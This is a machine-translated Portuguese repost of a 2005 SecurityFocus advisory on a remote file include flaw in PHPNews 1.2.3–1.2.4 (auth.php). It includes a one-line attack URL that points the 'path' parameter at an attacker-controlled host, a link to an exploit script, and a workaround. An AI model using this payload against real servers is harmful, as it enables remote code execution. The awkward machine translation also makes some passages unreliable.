.:: Vulnerabilidades ::.
.:: PHPNews Auth.PHP Remote File Include Vulnerability ::.
.:: Informação ::.  
identificação do bugtraq 12696
objeto -------
classe Erro Do Validation Da Entrada
cve Cve-mapa-nomatch
remoto Sim
local Não
publicado Março 01, 2005
updated Março 03, 2005
vulnerável
PHPNews PHPNews 1,2,3
PHPNews PHPNews 1,2,4
not vulnerable
Serviço-U 4,2 De RhinoSoft
.:: Exploit ::.

Os seguintes exemplos estão disponíveis:


] de http://www.example.com/[dir]/auth.php?path=http://[hacker_box/

http://downloads.securityfocus.com/vulnerabilities/exploits/phpN.py

.:: Solução ::.
 

Workaround:
A exploração deste tipo de vulnerability não pode ser possível a menos que ambos os ' allow_url_fopen ' e ' as diretrizes orientadoras dos register_globals' estiverem permitidas na configuração local do local PHP. Como um workaround para o este e edições similares, é possível incapacitar estas diretrizes orientadoras de PHP. Entretanto, este workaround deve ser testado em um ambiente do non-production antes de ser desdobrado porque poderia adversamente afetar a funcionalidade do software de PHP que depende destas diretrizes orientadoras que estão sendo permitidas.

Solução:

Atualmente nós não estamos cientes de nenhuns remendos vendedor-fornecidos para esta edição. Se você sentir nós estamos no erro ou estamos cientes de uma informação mais recente, enviamos-nos por favor em: vuldb@securityfocus.com < mailto:vuldb@securityfocus.com >.

Fonte: SecurityFocus
http://www.securityfocus.com/bid/12696
.:: Resolução recomendada: 800x600 pixeis ::.
Copyright © [B]reaking [Y]our [S]ecurity 2005. Todos os Direitos reservados.